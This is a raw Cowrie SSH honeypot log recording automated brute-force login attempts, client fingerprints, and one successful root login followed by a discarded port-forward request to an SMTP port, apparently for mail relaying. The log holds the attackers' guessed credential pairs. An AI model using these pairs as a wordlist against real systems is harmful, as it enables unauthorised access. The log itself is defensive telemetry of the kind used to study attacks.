{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49304,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8a94272dc24","protocol":"ssh","message":"New connection: 217.72.205.35:49304 (1.2.3.4:22) [session: d8a94272dc24]","sensor":"my-vps","timestamp":"2025-08-28T09:37:19.983290Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:37:19.984278Z","src_ip":"217.72.205.35","session":"d8a94272dc24"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:37:19.987033Z","src_ip":"185.93.89.7","session":"ac2548d6bec1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:37:19.987698Z","src_ip":"185.93.89.7","session":"ac2548d6bec1"}
{"eventid":"cowrie.login.failed","username":"index","password":"zxcvbn","message":"login attempt [index/zxcvbn] failed","sensor":"my-vps","timestamp":"2025-08-28T09:37:20.080002Z","src_ip":"185.93.89.7","session":"ac2548d6bec1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:37:21.147132Z","src_ip":"185.93.89.7","session":"ac2548d6bec1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50842,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a2ba8b58062","protocol":"ssh","message":"New connection: 51.79.164.132:50842 (1.2.3.4:22) [session: 8a2ba8b58062]","sensor":"my-vps","timestamp":"2025-08-28T09:37:21.350834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:37:21.614324Z","src_ip":"51.79.164.132","session":"8a2ba8b58062"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:37:21.615096Z","src_ip":"51.79.164.132","session":"8a2ba8b58062"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T09:37:24.143309Z","src_ip":"51.79.164.132","session":"8a2ba8b58062"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:37:25.363736Z","src_ip":"51.79.164.132","session":"8a2ba8b58062"}
{"eventid":"cowrie.session.closed","duration":31.014132738113403,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:37:25.670502Z","src_ip":"212.227.125.160","session":"41fcb9575f05"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45272,"dst_ip":"1.2.3.4","dst_port":22,"session":"162f145a24be","protocol":"ssh","message":"New connection: 185.93.89.7:45272 (1.2.3.4:22) [session: 162f145a24be]","sensor":"my-vps","timestamp":"2025-08-28T09:37:44.126539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:37:44.127761Z","src_ip":"185.93.89.7","session":"162f145a24be"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:37:44.147529Z","src_ip":"185.93.89.7","session":"162f145a24be"}
{"eventid":"cowrie.login.failed","username":"index","password":"hello123","message":"login attempt [index/hello123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:37:44.294132Z","src_ip":"185.93.89.7","session":"162f145a24be"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:37:45.314279Z","src_ip":"185.93.89.7","session":"162f145a24be"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60938,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5f88fedb245","protocol":"ssh","message":"New connection: 51.79.164.132:60938 (1.2.3.4:22) [session: e5f88fedb245]","sensor":"my-vps","timestamp":"2025-08-28T09:37:47.890787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:37:48.010502Z","src_ip":"51.79.164.132","session":"e5f88fedb245"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:37:48.542840Z","src_ip":"51.79.164.132","session":"e5f88fedb245"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:37:50.209052Z","src_ip":"51.79.164.132","session":"e5f88fedb245"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:37:51.611559Z","src_ip":"51.79.164.132","session":"e5f88fedb245"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38210,"dst_ip":"1.2.3.4","dst_port":22,"session":"bebaad05c486","protocol":"ssh","message":"New connection: 185.93.89.7:38210 (1.2.3.4:22) [session: bebaad05c486]","sensor":"my-vps","timestamp":"2025-08-28T09:38:07.710444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:38:07.724666Z","src_ip":"185.93.89.7","session":"bebaad05c486"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:38:07.750205Z","src_ip":"185.93.89.7","session":"bebaad05c486"}
{"eventid":"cowrie.login.failed","username":"index","password":"fuckoff","message":"login attempt [index/fuckoff] failed","sensor":"my-vps","timestamp":"2025-08-28T09:38:07.795864Z","src_ip":"185.93.89.7","session":"bebaad05c486"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:38:08.816216Z","src_ip":"185.93.89.7","session":"bebaad05c486"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43856,"dst_ip":"1.2.3.4","dst_port":22,"session":"875d54af2038","protocol":"ssh","message":"New connection: 51.79.164.132:43856 (1.2.3.4:22) [session: 875d54af2038]","sensor":"my-vps","timestamp":"2025-08-28T09:38:14.003643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:38:14.236675Z","src_ip":"51.79.164.132","session":"875d54af2038"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:38:14.237377Z","src_ip":"51.79.164.132","session":"875d54af2038"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T09:38:17.243454Z","src_ip":"51.79.164.132","session":"875d54af2038"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:38:18.430803Z","src_ip":"51.79.164.132","session":"875d54af2038"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":36630,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0d6e0ef98fe","protocol":"ssh","message":"New connection: 185.93.89.7:36630 (1.2.3.4:22) [session: d0d6e0ef98fe]","sensor":"my-vps","timestamp":"2025-08-28T09:38:31.380530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:38:31.439379Z","src_ip":"185.93.89.7","session":"d0d6e0ef98fe"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:38:31.440196Z","src_ip":"185.93.89.7","session":"d0d6e0ef98fe"}
{"eventid":"cowrie.login.failed","username":"index","password":"87654321","message":"login attempt [index/87654321] failed","sensor":"my-vps","timestamp":"2025-08-28T09:38:31.575117Z","src_ip":"185.93.89.7","session":"d0d6e0ef98fe"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:38:32.622780Z","src_ip":"185.93.89.7","session":"d0d6e0ef98fe"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39802,"dst_ip":"1.2.3.4","dst_port":22,"session":"032a371d32ef","protocol":"ssh","message":"New connection: 51.79.164.132:39802 (1.2.3.4:22) [session: 032a371d32ef]","sensor":"my-vps","timestamp":"2025-08-28T09:38:40.192427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:38:40.447346Z","src_ip":"51.79.164.132","session":"032a371d32ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:38:40.448298Z","src_ip":"51.79.164.132","session":"032a371d32ef"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:38:43.361059Z","src_ip":"51.79.164.132","session":"032a371d32ef"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:38:44.587730Z","src_ip":"51.79.164.132","session":"032a371d32ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37184,"dst_ip":"1.2.3.4","dst_port":22,"session":"af8f4e4f094b","protocol":"ssh","message":"New connection: 212.227.125.160:37184 (1.2.3.4:22) [session: af8f4e4f094b]","sensor":"my-vps","timestamp":"2025-08-28T09:38:46.732400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:38:46.733082Z","src_ip":"212.227.125.160","session":"af8f4e4f094b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:38:46.813923Z","src_ip":"212.227.125.160","session":"af8f4e4f094b"}
{"eventid":"cowrie.login.success","username":"root","password":"4rfv$RFV","message":"login attempt [root/4rfv$RFV] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:38:47.220114Z","src_ip":"212.227.125.160","session":"af8f4e4f094b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T09:38:47.304012Z","session":"af8f4e4f094b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T09:38:47.385330Z","src_ip":"212.227.125.160","session":"af8f4e4f094b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:38:47.470849Z","src_ip":"212.227.125.160","session":"af8f4e4f094b"}
